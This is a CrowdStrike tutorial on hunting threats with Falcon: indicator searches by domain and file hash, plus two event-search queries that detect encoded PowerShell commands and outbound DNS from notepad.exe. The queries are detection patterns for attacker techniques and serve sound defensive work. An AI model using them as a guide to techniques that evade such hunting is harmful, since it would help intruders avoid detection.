How to Hunt for Threat Activity with Falcon Endpoint Protection
Introduction to Threat Hunting with Falcon Endpoint Protection
CrowdStrike Falcon offers a powerful set of features that can be used to hunt for threat activity in your environment. The Falcon agent is constantly monitoring and recording endpoint activity and streaming it to the cloud and CrowdStrike’s Threat Graph. The data includes things like process execution, network connections, file system activity, user information, service details, script activity and admin tool usage. Storing this data in the Threat Graph ensures that the data is always available (even while endpoints are offline) and also ensures that it can be searched in real time and retrospectively – even the largest environments can get results in seconds.
CrowdStrike Falcon provides multiple approaches to threat hunting. In this article, we will review workflows that begin with indicator searches as well as custom event searches.
The Investigate App options allow administrators to search for indicators of compromise in their environment. This aids in understanding exposure to known threats, while also providing the ability to drill-down and pivot to explore the context around malicious activity. The CrowdStrike Threat Graph then ensures that you get immediate results from both online and offline systems no matter how large your organization. In this section, we will demonstrate two of the available indicator searches.
Under the Investigate App, select “Bulk Domain Search”.
Searches can be done individually or on multiple domains. Note that multiple domains should be separated by a space. After specifying a time range, click “Submit” to begin the search. The search will query all of your data in the Threat Graph and report any system in your environment has ever connected to one of these domains. A quick way to get sample results can be a search for www.google.com. In this example, we see that six different hosts have connected to conti.news.
Another option is to begin hunting with a file hash or filename. The “Hash search” is also available from the Investigate menu. In this example, we have used a SHA256 hash from an indicator of compromise (IOC). This file has been seen on two hosts in the last 24 hours, but there are no executions. Note that almost all elements of the search results are links that allow you to further explore and understand the file’s impact.
Clicking on one of the impacted hostnames will bring you to a screen that shows all activity on that system. In this example, we learn that this is a cloud host running Windows 7. This screen would also report if there were any detections on this host in the last seven days.
The Event Search functionality is for power users who want to access all of their data in the CrowdStrike Threat Graph. The flexible query language can handle complex searches that are often required for more advanced threat hunting. In this section, we will review two advanced hunting queries from our Hunting and Investigation documentation. This document is available to all CrowdStrike customers via the UI.
Under the Investigate menu, select “Event Search”.
The first sample query will search for encoded PowerShell commands executed in your environment. This activity is interesting to threat hunters because legitimate administrators typically do not encode their PowerShell commands. However, it is a very common activity for attackers. Copy the text below into the search field. Note, there is an option to specify a time range on the right side.
event_simpleName=ProcessRollup2 FileName=powershell.exe (CommandLine=*-enc* OR CommandLine=*encoded*) | table ComputerName UserName FileName CommandLine
After clicking the magnifying glass, any results will be returned as shown below.
The results include links to pivot and dive deeper on the results.
The second query is designed to look for network connections coming from unexpected applications. This example will look across the entire environment for instances where notepad.exe is attempting to make outbound connections. This information is useful for threat hunters because notepad.exe should never be making outbound connections. Any results almost certainly indicate a threat. Clear the contents of the search bar, paste the following text, and click the search icon to execute the search.
aid=* event_simpleName=”DnsRequest” | rename ContextProcessId as TargetProcessId | join TargetProcessId [search aid=* event_simpleName=”ProcessRollup2″ ImageFileName=”*notepad.exe”] | table ComputerName timestamp ImageFileName DomainName CommandLine
All of these results can be exported. There is also an option to schedule the queries to repeat on regular intervals.
CrowdStrike makes proactive threat hunting quick and easy. The agent collects extensive event telemetry and sends it to the cloud when the Threat Graph makes searches fast and effective. The Investigate menu includes options to search for specific indicators and create custom queries. Documentation is also available to provide samples that can be further tuned to meet more specific customer needs.